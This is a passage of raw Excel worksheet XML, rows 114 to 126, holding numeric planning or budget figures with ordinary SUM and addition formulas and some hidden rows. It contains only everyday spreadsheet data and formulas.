      <c r="I114" s="70">
        <f t="shared" si="231"/>
        <v>212.35000000000002</v>
      </c>
      <c r="J114" s="70">
        <f t="shared" si="231"/>
        <v>134.34</v>
      </c>
      <c r="K114" s="70">
        <f t="shared" si="231"/>
        <v>164.67000000000002</v>
      </c>
      <c r="L114" s="70">
        <f t="shared" si="231"/>
        <v>78.800000000000011</v>
      </c>
      <c r="M114" s="90">
        <f>SUM(M115:M117)</f>
        <v>1243.9100000000001</v>
      </c>
      <c r="N114" s="98">
        <f>N115+N116+N117</f>
        <v>1580.1900000000003</v>
      </c>
      <c r="O114" s="73">
        <f>O115+O116+O117</f>
        <v>1580.1900000000003</v>
      </c>
      <c r="P114" s="73">
        <f t="shared" ref="P114:AM114" si="232">P115+P116+P117</f>
        <v>159.1</v>
      </c>
      <c r="Q114" s="73">
        <v>126.3</v>
      </c>
      <c r="R114" s="73">
        <f t="shared" si="232"/>
        <v>159.1</v>
      </c>
      <c r="S114" s="73"/>
      <c r="T114" s="73">
        <f t="shared" si="232"/>
        <v>133.70000000000002</v>
      </c>
      <c r="U114" s="73">
        <v>109.52000000000001</v>
      </c>
      <c r="V114" s="73">
        <f t="shared" si="232"/>
        <v>133.70000000000002</v>
      </c>
      <c r="W114" s="73"/>
      <c r="X114" s="73">
        <f t="shared" si="232"/>
        <v>332.05</v>
      </c>
      <c r="Y114" s="73">
        <v>272.45</v>
      </c>
      <c r="Z114" s="73">
        <f t="shared" si="232"/>
        <v>332.05</v>
      </c>
      <c r="AA114" s="73"/>
      <c r="AB114" s="73">
        <f t="shared" si="232"/>
        <v>252.52000000000004</v>
      </c>
      <c r="AC114" s="73"/>
      <c r="AD114" s="73">
        <f t="shared" si="232"/>
        <v>252.52000000000004</v>
      </c>
      <c r="AE114" s="73"/>
      <c r="AF114" s="73">
        <f t="shared" si="232"/>
        <v>167.64</v>
      </c>
      <c r="AG114" s="73">
        <f t="shared" si="232"/>
        <v>167.64</v>
      </c>
      <c r="AH114" s="73"/>
      <c r="AI114" s="73">
        <f t="shared" si="232"/>
        <v>235.70000000000002</v>
      </c>
      <c r="AJ114" s="73">
        <f t="shared" si="232"/>
        <v>235.70000000000002</v>
      </c>
      <c r="AK114" s="73"/>
      <c r="AL114" s="73">
        <f t="shared" si="232"/>
        <v>109.00000000000001</v>
      </c>
      <c r="AM114" s="73">
        <f t="shared" si="232"/>
        <v>109.00000000000001</v>
      </c>
      <c r="AN114" s="73"/>
      <c r="AO114" s="73">
        <f t="shared" si="222"/>
        <v>100</v>
      </c>
      <c r="AP114" s="74">
        <f t="shared" si="204"/>
        <v>336.2800000000002</v>
      </c>
      <c r="AQ114" s="80"/>
    </row>
    <row r="115" spans="1:43" ht="22.5" customHeight="1">
      <c r="A115" s="76" t="s">
        <v>3</v>
      </c>
      <c r="B115" s="81" t="s">
        <v>111</v>
      </c>
      <c r="C115" s="25" t="s">
        <v>1</v>
      </c>
      <c r="D115" s="89">
        <v>697.9</v>
      </c>
      <c r="E115" s="83">
        <v>1098.43</v>
      </c>
      <c r="F115" s="89">
        <f>73.1+53.2</f>
        <v>126.3</v>
      </c>
      <c r="G115" s="89">
        <f>73.9+35.62</f>
        <v>109.52000000000001</v>
      </c>
      <c r="H115" s="121">
        <f>184.4+88.05</f>
        <v>272.45</v>
      </c>
      <c r="I115" s="121">
        <f>143.8+68.55</f>
        <v>212.35000000000002</v>
      </c>
      <c r="J115" s="89">
        <f>84.4+49.94</f>
        <v>134.34</v>
      </c>
      <c r="K115" s="89">
        <f>108.2+56.47</f>
        <v>164.67000000000002</v>
      </c>
      <c r="L115" s="121">
        <f>30.1+48.7</f>
        <v>78.800000000000011</v>
      </c>
      <c r="M115" s="132">
        <v>1098.43</v>
      </c>
      <c r="N115" s="98">
        <f>P115+T115+X115+AB115+AF115+AI115+AL115</f>
        <v>1389.7100000000003</v>
      </c>
      <c r="O115" s="86">
        <f>R115+V115+Z115+AD115+AG115+AJ115+AM115</f>
        <v>1389.7100000000003</v>
      </c>
      <c r="P115" s="87">
        <f>73.1+53.2+32.8</f>
        <v>159.1</v>
      </c>
      <c r="Q115" s="87">
        <v>126.3</v>
      </c>
      <c r="R115" s="87">
        <f>73.1+53.2+32.8</f>
        <v>159.1</v>
      </c>
      <c r="S115" s="87"/>
      <c r="T115" s="87">
        <f>73.9+35.62+24.18</f>
        <v>133.70000000000002</v>
      </c>
      <c r="U115" s="87">
        <v>109.52000000000001</v>
      </c>
      <c r="V115" s="87">
        <f>73.9+35.62+24.18</f>
        <v>133.70000000000002</v>
      </c>
      <c r="W115" s="12"/>
      <c r="X115" s="11">
        <f>184.4+88.05+59.6</f>
        <v>332.05</v>
      </c>
      <c r="Y115" s="11">
        <v>272.45</v>
      </c>
      <c r="Z115" s="11">
        <f>184.4+88.05+59.6</f>
        <v>332.05</v>
      </c>
      <c r="AA115" s="11"/>
      <c r="AB115" s="11">
        <f>143.8+68.55+40.17</f>
        <v>252.52000000000004</v>
      </c>
      <c r="AC115" s="11"/>
      <c r="AD115" s="11">
        <f>143.8+68.55+40.17</f>
        <v>252.52000000000004</v>
      </c>
      <c r="AE115" s="12"/>
      <c r="AF115" s="87">
        <f>84.4+49.94+33.3</f>
        <v>167.64</v>
      </c>
      <c r="AG115" s="87">
        <f>84.4+49.94+33.3</f>
        <v>167.64</v>
      </c>
      <c r="AH115" s="87"/>
      <c r="AI115" s="87">
        <f>108.2+56.47+71.03</f>
        <v>235.70000000000002</v>
      </c>
      <c r="AJ115" s="87">
        <f>108.2+56.47+71.03</f>
        <v>235.70000000000002</v>
      </c>
      <c r="AK115" s="12"/>
      <c r="AL115" s="11">
        <f>30.1+48.7+30.2</f>
        <v>109.00000000000001</v>
      </c>
      <c r="AM115" s="11">
        <f>30.1+48.7+30.2</f>
        <v>109.00000000000001</v>
      </c>
      <c r="AN115" s="12"/>
      <c r="AO115" s="73">
        <f t="shared" si="222"/>
        <v>100</v>
      </c>
      <c r="AP115" s="74"/>
      <c r="AQ115" s="123"/>
    </row>
    <row r="116" spans="1:43" ht="22.5" customHeight="1">
      <c r="A116" s="76" t="s">
        <v>3</v>
      </c>
      <c r="B116" s="101" t="s">
        <v>123</v>
      </c>
      <c r="C116" s="25" t="s">
        <v>1</v>
      </c>
      <c r="D116" s="89">
        <v>72.94</v>
      </c>
      <c r="E116" s="83">
        <f>72.94+15</f>
        <v>87.94</v>
      </c>
      <c r="F116" s="70"/>
      <c r="G116" s="70"/>
      <c r="H116" s="70"/>
      <c r="I116" s="70"/>
      <c r="J116" s="70"/>
      <c r="K116" s="70"/>
      <c r="L116" s="70"/>
      <c r="M116" s="90">
        <v>87.94</v>
      </c>
      <c r="N116" s="192">
        <f>72.94+15+15</f>
        <v>102.94</v>
      </c>
      <c r="O116" s="86">
        <f>72.94+15+15</f>
        <v>102.94</v>
      </c>
      <c r="P116" s="86"/>
      <c r="Q116" s="86"/>
      <c r="R116" s="79"/>
      <c r="S116" s="79"/>
      <c r="T116" s="86"/>
      <c r="U116" s="86"/>
      <c r="V116" s="79"/>
      <c r="W116" s="79"/>
      <c r="X116" s="86"/>
      <c r="Y116" s="86"/>
      <c r="Z116" s="79"/>
      <c r="AA116" s="79"/>
      <c r="AB116" s="86"/>
      <c r="AC116" s="86"/>
      <c r="AD116" s="79"/>
      <c r="AE116" s="79"/>
      <c r="AF116" s="86"/>
      <c r="AG116" s="79"/>
      <c r="AH116" s="79"/>
      <c r="AI116" s="86"/>
      <c r="AJ116" s="79"/>
      <c r="AK116" s="79"/>
      <c r="AL116" s="86"/>
      <c r="AM116" s="79"/>
      <c r="AN116" s="79"/>
      <c r="AO116" s="73">
        <f t="shared" si="222"/>
        <v>100</v>
      </c>
      <c r="AP116" s="74"/>
      <c r="AQ116" s="80"/>
    </row>
    <row r="117" spans="1:43" ht="22.5" customHeight="1">
      <c r="A117" s="76" t="s">
        <v>3</v>
      </c>
      <c r="B117" s="101" t="s">
        <v>117</v>
      </c>
      <c r="C117" s="25" t="s">
        <v>1</v>
      </c>
      <c r="D117" s="89">
        <v>36</v>
      </c>
      <c r="E117" s="83">
        <f>36+21.5</f>
        <v>57.5</v>
      </c>
      <c r="F117" s="70"/>
      <c r="G117" s="70"/>
      <c r="H117" s="70"/>
      <c r="I117" s="70"/>
      <c r="J117" s="70"/>
      <c r="K117" s="70"/>
      <c r="L117" s="70"/>
      <c r="M117" s="90">
        <v>57.54</v>
      </c>
      <c r="N117" s="192">
        <f>36+21.54+30</f>
        <v>87.539999999999992</v>
      </c>
      <c r="O117" s="86">
        <f>36+21.54+30</f>
        <v>87.539999999999992</v>
      </c>
      <c r="P117" s="86"/>
      <c r="Q117" s="86"/>
      <c r="R117" s="79"/>
      <c r="S117" s="79"/>
      <c r="T117" s="86"/>
      <c r="U117" s="86"/>
      <c r="V117" s="79"/>
      <c r="W117" s="79"/>
      <c r="X117" s="86"/>
      <c r="Y117" s="86"/>
      <c r="Z117" s="79"/>
      <c r="AA117" s="79"/>
      <c r="AB117" s="86"/>
      <c r="AC117" s="86"/>
      <c r="AD117" s="79"/>
      <c r="AE117" s="79"/>
      <c r="AF117" s="86"/>
      <c r="AG117" s="79"/>
      <c r="AH117" s="79"/>
      <c r="AI117" s="86"/>
      <c r="AJ117" s="79"/>
      <c r="AK117" s="79"/>
      <c r="AL117" s="86"/>
      <c r="AM117" s="79"/>
      <c r="AN117" s="79"/>
      <c r="AO117" s="73">
        <f t="shared" si="222"/>
        <v>100</v>
      </c>
      <c r="AP117" s="74"/>
      <c r="AQ117" s="80"/>
    </row>
    <row r="118" spans="1:43" ht="22.5" customHeight="1">
      <c r="A118" s="76" t="s">
        <v>15</v>
      </c>
      <c r="B118" s="24" t="s">
        <v>129</v>
      </c>
      <c r="C118" s="69" t="s">
        <v>1</v>
      </c>
      <c r="D118" s="70">
        <v>437.1</v>
      </c>
      <c r="E118" s="71">
        <f>E119+E120+E121</f>
        <v>331</v>
      </c>
      <c r="F118" s="70">
        <f t="shared" ref="F118:L118" si="233">F119+F120+F121</f>
        <v>32.799999999999997</v>
      </c>
      <c r="G118" s="70">
        <f t="shared" si="233"/>
        <v>24.18</v>
      </c>
      <c r="H118" s="70">
        <f t="shared" si="233"/>
        <v>59.6</v>
      </c>
      <c r="I118" s="70">
        <f t="shared" si="233"/>
        <v>40.17</v>
      </c>
      <c r="J118" s="70">
        <f t="shared" si="233"/>
        <v>33.299999999999997</v>
      </c>
      <c r="K118" s="70">
        <f t="shared" si="233"/>
        <v>71.03</v>
      </c>
      <c r="L118" s="70">
        <f t="shared" si="233"/>
        <v>30.2</v>
      </c>
      <c r="M118" s="124">
        <v>336.28</v>
      </c>
      <c r="N118" s="78">
        <f>N119+N120+N121</f>
        <v>240</v>
      </c>
      <c r="O118" s="73">
        <f>O119+O120+O121</f>
        <v>255.91</v>
      </c>
      <c r="P118" s="73">
        <f>P119+P120+P121</f>
        <v>75</v>
      </c>
      <c r="Q118" s="73">
        <v>32.799999999999997</v>
      </c>
      <c r="R118" s="73">
        <f t="shared" ref="R118:AM118" si="234">R119+R120+R121</f>
        <v>76.45</v>
      </c>
      <c r="S118" s="33"/>
      <c r="T118" s="73">
        <f t="shared" si="234"/>
        <v>28</v>
      </c>
      <c r="U118" s="73">
        <v>24.18</v>
      </c>
      <c r="V118" s="73">
        <f t="shared" si="234"/>
        <v>28.24</v>
      </c>
      <c r="W118" s="73"/>
      <c r="X118" s="73">
        <f t="shared" si="234"/>
        <v>30</v>
      </c>
      <c r="Y118" s="73">
        <v>59.6</v>
      </c>
      <c r="Z118" s="73">
        <f t="shared" si="234"/>
        <v>30.6</v>
      </c>
      <c r="AA118" s="73"/>
      <c r="AB118" s="73">
        <f t="shared" si="234"/>
        <v>35</v>
      </c>
      <c r="AC118" s="73"/>
      <c r="AD118" s="73">
        <f t="shared" si="234"/>
        <v>35.130000000000003</v>
      </c>
      <c r="AE118" s="73"/>
      <c r="AF118" s="73">
        <f t="shared" si="234"/>
        <v>32</v>
      </c>
      <c r="AG118" s="73">
        <f t="shared" si="234"/>
        <v>43.6</v>
      </c>
      <c r="AH118" s="73"/>
      <c r="AI118" s="73">
        <f t="shared" si="234"/>
        <v>15</v>
      </c>
      <c r="AJ118" s="73">
        <f t="shared" si="234"/>
        <v>16.829999999999998</v>
      </c>
      <c r="AK118" s="73"/>
      <c r="AL118" s="73">
        <f t="shared" si="234"/>
        <v>25</v>
      </c>
      <c r="AM118" s="73">
        <f t="shared" si="234"/>
        <v>25.06</v>
      </c>
      <c r="AN118" s="73"/>
      <c r="AO118" s="73">
        <f t="shared" si="222"/>
        <v>106.62916666666666</v>
      </c>
      <c r="AP118" s="74"/>
      <c r="AQ118" s="80"/>
    </row>
    <row r="119" spans="1:43" ht="22.5" customHeight="1">
      <c r="A119" s="76" t="s">
        <v>3</v>
      </c>
      <c r="B119" s="81" t="s">
        <v>111</v>
      </c>
      <c r="C119" s="25" t="s">
        <v>1</v>
      </c>
      <c r="D119" s="89">
        <v>400.53</v>
      </c>
      <c r="E119" s="83">
        <v>286</v>
      </c>
      <c r="F119" s="89">
        <v>32.799999999999997</v>
      </c>
      <c r="G119" s="89">
        <v>24.18</v>
      </c>
      <c r="H119" s="89">
        <v>59.6</v>
      </c>
      <c r="I119" s="89">
        <v>40.17</v>
      </c>
      <c r="J119" s="89">
        <v>33.299999999999997</v>
      </c>
      <c r="K119" s="89">
        <v>71.03</v>
      </c>
      <c r="L119" s="89">
        <v>30.2</v>
      </c>
      <c r="M119" s="85">
        <v>57.54</v>
      </c>
      <c r="N119" s="98">
        <f>P119+T119+X119+AB119+AF119+AI119+AL119</f>
        <v>190</v>
      </c>
      <c r="O119" s="86">
        <f>R119+V119+Z119+AD119+AG119+AJ119+AM119</f>
        <v>204.56</v>
      </c>
      <c r="P119" s="86">
        <v>25</v>
      </c>
      <c r="Q119" s="86">
        <v>32.799999999999997</v>
      </c>
      <c r="R119" s="87">
        <v>25.1</v>
      </c>
      <c r="S119" s="87"/>
      <c r="T119" s="86">
        <v>28</v>
      </c>
      <c r="U119" s="86">
        <v>24.18</v>
      </c>
      <c r="V119" s="87">
        <v>28.24</v>
      </c>
      <c r="W119" s="87"/>
      <c r="X119" s="86">
        <v>30</v>
      </c>
      <c r="Y119" s="86">
        <v>59.6</v>
      </c>
      <c r="Z119" s="87">
        <v>30.6</v>
      </c>
      <c r="AA119" s="87"/>
      <c r="AB119" s="86">
        <v>35</v>
      </c>
      <c r="AC119" s="86"/>
      <c r="AD119" s="87">
        <v>35.130000000000003</v>
      </c>
      <c r="AE119" s="87"/>
      <c r="AF119" s="86">
        <v>32</v>
      </c>
      <c r="AG119" s="87">
        <v>43.6</v>
      </c>
      <c r="AH119" s="87"/>
      <c r="AI119" s="86">
        <v>15</v>
      </c>
      <c r="AJ119" s="87">
        <v>16.829999999999998</v>
      </c>
      <c r="AK119" s="87"/>
      <c r="AL119" s="86">
        <v>25</v>
      </c>
      <c r="AM119" s="87">
        <v>25.06</v>
      </c>
      <c r="AN119" s="87"/>
      <c r="AO119" s="73">
        <f t="shared" si="222"/>
        <v>107.66315789473684</v>
      </c>
      <c r="AP119" s="74"/>
      <c r="AQ119" s="91"/>
    </row>
    <row r="120" spans="1:43" ht="22.5" customHeight="1">
      <c r="A120" s="76" t="s">
        <v>3</v>
      </c>
      <c r="B120" s="101" t="s">
        <v>123</v>
      </c>
      <c r="C120" s="25" t="s">
        <v>1</v>
      </c>
      <c r="D120" s="89">
        <v>15</v>
      </c>
      <c r="E120" s="83">
        <v>15</v>
      </c>
      <c r="F120" s="70"/>
      <c r="G120" s="70"/>
      <c r="H120" s="70"/>
      <c r="I120" s="70"/>
      <c r="J120" s="70"/>
      <c r="K120" s="70"/>
      <c r="L120" s="70"/>
      <c r="M120" s="85">
        <v>336.28000000000003</v>
      </c>
      <c r="N120" s="98">
        <v>20</v>
      </c>
      <c r="O120" s="133">
        <v>20</v>
      </c>
      <c r="P120" s="86">
        <v>20</v>
      </c>
      <c r="Q120" s="86"/>
      <c r="R120" s="87">
        <v>20</v>
      </c>
      <c r="S120" s="87"/>
      <c r="T120" s="86"/>
      <c r="U120" s="86"/>
      <c r="V120" s="79"/>
      <c r="W120" s="79"/>
      <c r="X120" s="86"/>
      <c r="Y120" s="86"/>
      <c r="Z120" s="79"/>
      <c r="AA120" s="79"/>
      <c r="AB120" s="86"/>
      <c r="AC120" s="86"/>
      <c r="AD120" s="79"/>
      <c r="AE120" s="79"/>
      <c r="AF120" s="86"/>
      <c r="AG120" s="79"/>
      <c r="AH120" s="79"/>
      <c r="AI120" s="86"/>
      <c r="AJ120" s="79"/>
      <c r="AK120" s="79"/>
      <c r="AL120" s="86"/>
      <c r="AM120" s="79"/>
      <c r="AN120" s="79"/>
      <c r="AO120" s="73">
        <f t="shared" si="222"/>
        <v>100</v>
      </c>
      <c r="AP120" s="74"/>
      <c r="AQ120" s="80"/>
    </row>
    <row r="121" spans="1:43" ht="22.5" customHeight="1">
      <c r="A121" s="76" t="s">
        <v>3</v>
      </c>
      <c r="B121" s="101" t="s">
        <v>117</v>
      </c>
      <c r="C121" s="25" t="s">
        <v>1</v>
      </c>
      <c r="D121" s="89">
        <v>21.54</v>
      </c>
      <c r="E121" s="83">
        <v>30</v>
      </c>
      <c r="F121" s="70"/>
      <c r="G121" s="70"/>
      <c r="H121" s="70"/>
      <c r="I121" s="70"/>
      <c r="J121" s="70"/>
      <c r="K121" s="70"/>
      <c r="L121" s="70"/>
      <c r="M121" s="85">
        <v>291.28000000000003</v>
      </c>
      <c r="N121" s="98">
        <v>30</v>
      </c>
      <c r="O121" s="86">
        <v>31.35</v>
      </c>
      <c r="P121" s="86">
        <v>30</v>
      </c>
      <c r="Q121" s="86"/>
      <c r="R121" s="87">
        <v>31.35</v>
      </c>
      <c r="S121" s="87"/>
      <c r="T121" s="86"/>
      <c r="U121" s="86"/>
      <c r="V121" s="79"/>
      <c r="W121" s="79"/>
      <c r="X121" s="86"/>
      <c r="Y121" s="86"/>
      <c r="Z121" s="79"/>
      <c r="AA121" s="79"/>
      <c r="AB121" s="86"/>
      <c r="AC121" s="86"/>
      <c r="AD121" s="79"/>
      <c r="AE121" s="79"/>
      <c r="AF121" s="86"/>
      <c r="AG121" s="79"/>
      <c r="AH121" s="79"/>
      <c r="AI121" s="86"/>
      <c r="AJ121" s="79"/>
      <c r="AK121" s="79"/>
      <c r="AL121" s="86"/>
      <c r="AM121" s="79"/>
      <c r="AN121" s="79"/>
      <c r="AO121" s="73">
        <f t="shared" si="222"/>
        <v>104.50000000000001</v>
      </c>
      <c r="AP121" s="74"/>
      <c r="AQ121" s="80"/>
    </row>
    <row r="122" spans="1:43" s="189" customFormat="1" ht="22.5" hidden="1" customHeight="1">
      <c r="A122" s="76" t="s">
        <v>112</v>
      </c>
      <c r="B122" s="24" t="s">
        <v>108</v>
      </c>
      <c r="C122" s="69" t="s">
        <v>109</v>
      </c>
      <c r="D122" s="134">
        <v>64000</v>
      </c>
      <c r="E122" s="135">
        <f>E123+E124+E125</f>
        <v>58000</v>
      </c>
      <c r="F122" s="136">
        <f t="shared" ref="F122:L122" si="235">SUM(F123:F125)</f>
        <v>8100</v>
      </c>
      <c r="G122" s="136">
        <f t="shared" si="235"/>
        <v>6000</v>
      </c>
      <c r="H122" s="136">
        <f t="shared" si="235"/>
        <v>5500</v>
      </c>
      <c r="I122" s="136">
        <f t="shared" si="235"/>
        <v>8000</v>
      </c>
      <c r="J122" s="136">
        <f t="shared" si="235"/>
        <v>6500</v>
      </c>
      <c r="K122" s="136">
        <f t="shared" si="235"/>
        <v>12000</v>
      </c>
      <c r="L122" s="136">
        <f t="shared" si="235"/>
        <v>7000</v>
      </c>
      <c r="M122" s="137">
        <v>15</v>
      </c>
      <c r="N122" s="199"/>
      <c r="O122" s="73">
        <f>O123+O124+O125</f>
        <v>58100</v>
      </c>
      <c r="P122" s="73"/>
      <c r="Q122" s="73">
        <v>8100</v>
      </c>
      <c r="R122" s="138">
        <f t="shared" ref="R122" si="236">SUM(R123:R125)</f>
        <v>8100</v>
      </c>
      <c r="S122" s="138"/>
      <c r="T122" s="138"/>
      <c r="U122" s="138">
        <v>6000</v>
      </c>
      <c r="V122" s="138">
        <f t="shared" ref="V122" si="237">SUM(V123:V125)</f>
        <v>6000</v>
      </c>
      <c r="W122" s="138"/>
      <c r="X122" s="138"/>
      <c r="Y122" s="138">
        <v>5500</v>
      </c>
      <c r="Z122" s="138">
        <f t="shared" ref="Z122" si="238">SUM(Z123:Z125)</f>
        <v>5500</v>
      </c>
      <c r="AA122" s="138"/>
      <c r="AB122" s="138"/>
      <c r="AC122" s="138"/>
      <c r="AD122" s="138">
        <f t="shared" ref="AD122" si="239">SUM(AD123:AD125)</f>
        <v>8000</v>
      </c>
      <c r="AE122" s="138"/>
      <c r="AF122" s="138"/>
      <c r="AG122" s="138">
        <f t="shared" ref="AG122" si="240">SUM(AG123:AG125)</f>
        <v>6500</v>
      </c>
      <c r="AH122" s="138"/>
      <c r="AI122" s="138"/>
      <c r="AJ122" s="138">
        <f t="shared" ref="AJ122" si="241">SUM(AJ123:AJ125)</f>
        <v>12000</v>
      </c>
      <c r="AK122" s="138"/>
      <c r="AL122" s="138"/>
      <c r="AM122" s="138">
        <f t="shared" ref="AM122" si="242">SUM(AM123:AM125)</f>
        <v>7000</v>
      </c>
      <c r="AN122" s="138"/>
      <c r="AO122" s="73" t="e">
        <f t="shared" si="222"/>
        <v>#DIV/0!</v>
      </c>
      <c r="AP122" s="74">
        <f t="shared" ref="AP122:AP139" si="243">O122-M122</f>
        <v>58085</v>
      </c>
      <c r="AQ122" s="139"/>
    </row>
    <row r="123" spans="1:43" s="200" customFormat="1" ht="22.5" hidden="1" customHeight="1">
      <c r="A123" s="103" t="s">
        <v>34</v>
      </c>
      <c r="B123" s="81" t="s">
        <v>111</v>
      </c>
      <c r="C123" s="25" t="s">
        <v>109</v>
      </c>
      <c r="D123" s="140">
        <v>55000</v>
      </c>
      <c r="E123" s="97">
        <v>50000</v>
      </c>
      <c r="F123" s="82">
        <v>7100</v>
      </c>
      <c r="G123" s="82">
        <v>6000</v>
      </c>
      <c r="H123" s="82">
        <v>5500</v>
      </c>
      <c r="I123" s="82">
        <v>8000</v>
      </c>
      <c r="J123" s="82">
        <v>6500</v>
      </c>
      <c r="K123" s="82">
        <v>10000</v>
      </c>
      <c r="L123" s="82">
        <f>3700+3300</f>
        <v>7000</v>
      </c>
      <c r="M123" s="94">
        <v>30</v>
      </c>
      <c r="N123" s="194"/>
      <c r="O123" s="86">
        <f>R123+V123+Z123+AD123+AG123+AJ123+AM123</f>
        <v>50100</v>
      </c>
      <c r="P123" s="86"/>
      <c r="Q123" s="86">
        <v>7100</v>
      </c>
      <c r="R123" s="95">
        <v>7100</v>
      </c>
      <c r="S123" s="95"/>
      <c r="T123" s="95"/>
      <c r="U123" s="95">
        <v>6000</v>
      </c>
      <c r="V123" s="95">
        <v>6000</v>
      </c>
      <c r="W123" s="95"/>
      <c r="X123" s="95"/>
      <c r="Y123" s="95">
        <v>5500</v>
      </c>
      <c r="Z123" s="95">
        <v>5500</v>
      </c>
      <c r="AA123" s="95"/>
      <c r="AB123" s="95"/>
      <c r="AC123" s="95"/>
      <c r="AD123" s="95">
        <v>8000</v>
      </c>
      <c r="AE123" s="95"/>
      <c r="AF123" s="95"/>
      <c r="AG123" s="95">
        <v>6500</v>
      </c>
      <c r="AH123" s="95"/>
      <c r="AI123" s="95"/>
      <c r="AJ123" s="95">
        <v>10000</v>
      </c>
      <c r="AK123" s="95"/>
      <c r="AL123" s="95"/>
      <c r="AM123" s="95">
        <f>3700+3300</f>
        <v>7000</v>
      </c>
      <c r="AN123" s="95"/>
      <c r="AO123" s="73" t="e">
        <f t="shared" si="222"/>
        <v>#DIV/0!</v>
      </c>
      <c r="AP123" s="74">
        <f t="shared" si="243"/>
        <v>50070</v>
      </c>
      <c r="AQ123" s="96"/>
    </row>
    <row r="124" spans="1:43" ht="22.5" hidden="1" customHeight="1">
      <c r="A124" s="102" t="s">
        <v>3</v>
      </c>
      <c r="B124" s="81" t="s">
        <v>119</v>
      </c>
      <c r="C124" s="25" t="s">
        <v>109</v>
      </c>
      <c r="D124" s="104">
        <v>5000</v>
      </c>
      <c r="E124" s="83">
        <v>5000</v>
      </c>
      <c r="F124" s="89"/>
      <c r="G124" s="89"/>
      <c r="H124" s="89"/>
      <c r="I124" s="89"/>
      <c r="J124" s="89"/>
      <c r="K124" s="89"/>
      <c r="L124" s="89"/>
      <c r="M124" s="85">
        <v>58090</v>
      </c>
      <c r="N124" s="98"/>
      <c r="O124" s="86">
        <v>5000</v>
      </c>
      <c r="P124" s="86"/>
      <c r="Q124" s="86"/>
      <c r="R124" s="87"/>
      <c r="S124" s="87"/>
      <c r="T124" s="87"/>
      <c r="U124" s="87"/>
      <c r="V124" s="87"/>
      <c r="W124" s="87"/>
      <c r="X124" s="87"/>
      <c r="Y124" s="87"/>
      <c r="Z124" s="87"/>
      <c r="AA124" s="87"/>
      <c r="AB124" s="87"/>
      <c r="AC124" s="87"/>
      <c r="AD124" s="87"/>
      <c r="AE124" s="87"/>
      <c r="AF124" s="87"/>
      <c r="AG124" s="87"/>
      <c r="AH124" s="87"/>
      <c r="AI124" s="87"/>
      <c r="AJ124" s="87"/>
      <c r="AK124" s="87"/>
      <c r="AL124" s="87"/>
      <c r="AM124" s="87"/>
      <c r="AN124" s="87"/>
      <c r="AO124" s="73" t="e">
        <f t="shared" si="222"/>
        <v>#DIV/0!</v>
      </c>
      <c r="AP124" s="74">
        <f t="shared" si="243"/>
        <v>-53090</v>
      </c>
      <c r="AQ124" s="91"/>
    </row>
    <row r="125" spans="1:43" ht="22.5" hidden="1" customHeight="1">
      <c r="A125" s="102" t="s">
        <v>3</v>
      </c>
      <c r="B125" s="81" t="s">
        <v>110</v>
      </c>
      <c r="C125" s="25" t="s">
        <v>109</v>
      </c>
      <c r="D125" s="104">
        <v>4000</v>
      </c>
      <c r="E125" s="83">
        <v>3000</v>
      </c>
      <c r="F125" s="89">
        <v>1000</v>
      </c>
      <c r="G125" s="89"/>
      <c r="H125" s="89"/>
      <c r="I125" s="89"/>
      <c r="J125" s="89"/>
      <c r="K125" s="89">
        <v>2000</v>
      </c>
      <c r="L125" s="89"/>
      <c r="M125" s="85">
        <v>50090</v>
      </c>
      <c r="N125" s="98"/>
      <c r="O125" s="86">
        <f>R125+V125+Z125+AD125+AG125+AJ125+AM125</f>
        <v>3000</v>
      </c>
      <c r="P125" s="86"/>
      <c r="Q125" s="86">
        <v>1000</v>
      </c>
      <c r="R125" s="87">
        <v>1000</v>
      </c>
      <c r="S125" s="87"/>
      <c r="T125" s="87"/>
      <c r="U125" s="87"/>
      <c r="V125" s="87"/>
      <c r="W125" s="87"/>
      <c r="X125" s="87"/>
      <c r="Y125" s="87"/>
      <c r="Z125" s="87"/>
      <c r="AA125" s="87"/>
      <c r="AB125" s="87"/>
      <c r="AC125" s="87"/>
      <c r="AD125" s="87"/>
      <c r="AE125" s="87"/>
      <c r="AF125" s="87"/>
      <c r="AG125" s="87"/>
      <c r="AH125" s="87"/>
      <c r="AI125" s="87"/>
      <c r="AJ125" s="87">
        <v>2000</v>
      </c>
      <c r="AK125" s="87"/>
      <c r="AL125" s="87"/>
      <c r="AM125" s="87"/>
      <c r="AN125" s="87"/>
      <c r="AO125" s="73" t="e">
        <f t="shared" si="222"/>
        <v>#DIV/0!</v>
      </c>
      <c r="AP125" s="74">
        <f t="shared" si="243"/>
        <v>-47090</v>
      </c>
      <c r="AQ125" s="91"/>
    </row>
    <row r="126" spans="1:43" s="189" customFormat="1" ht="22.5" hidden="1" customHeight="1">
      <c r="A126" s="76" t="s">
        <v>113</v>
      </c>
      <c r="B126" s="24" t="s">
        <v>122</v>
      </c>
      <c r="C126" s="69" t="s">
        <v>1</v>
      </c>
      <c r="D126" s="70">
        <v>532</v>
      </c>
      <c r="E126" s="71">
        <v>0</v>
      </c>
      <c r="F126" s="70">
        <f>F127+F128</f>
        <v>0</v>
      </c>
      <c r="G126" s="70">
        <f t="shared" ref="G126:L126" si="244">G127+G128</f>
        <v>0</v>
      </c>
      <c r="H126" s="70">
        <f t="shared" si="244"/>
        <v>0</v>
      </c>
      <c r="I126" s="70">
        <f t="shared" si="244"/>
        <v>0</v>
      </c>
      <c r="J126" s="70">
        <f t="shared" si="244"/>
        <v>0</v>
      </c>
      <c r="K126" s="70">
        <f t="shared" si="244"/>
        <v>0</v>
      </c>
      <c r="L126" s="70">
        <f t="shared" si="244"/>
        <v>0</v>
      </c>
      <c r="M126" s="77">
        <v>5000</v>
      </c>
      <c r="N126" s="78"/>
      <c r="O126" s="73">
        <v>0</v>
      </c>
      <c r="P126" s="73"/>
      <c r="Q126" s="73">
        <v>0</v>
      </c>
      <c r="R126" s="79">
        <f>R127+R128</f>
        <v>0</v>
      </c>
      <c r="S126" s="79"/>
      <c r="T126" s="79"/>
      <c r="U126" s="79">
        <v>0</v>
      </c>
      <c r="V126" s="79">
        <f t="shared" ref="V126" si="245">V127+V128</f>
        <v>0</v>
      </c>
      <c r="W126" s="79"/>
      <c r="X126" s="79"/>
      <c r="Y126" s="79">
        <v>0</v>
      </c>
      <c r="Z126" s="79">
        <f t="shared" ref="Z126" si="246">Z127+Z128</f>
        <v>0</v>
      </c>
      <c r="AA126" s="79"/>
      <c r="AB126" s="79"/>
      <c r="AC126" s="79"/>
      <c r="AD126" s="79">
        <f t="shared" ref="AD126" si="247">AD127+AD128</f>
        <v>0</v>
      </c>
      <c r="AE126" s="79"/>
      <c r="AF126" s="79"/>
      <c r="AG126" s="79">
        <f t="shared" ref="AG126" si="248">AG127+AG128</f>
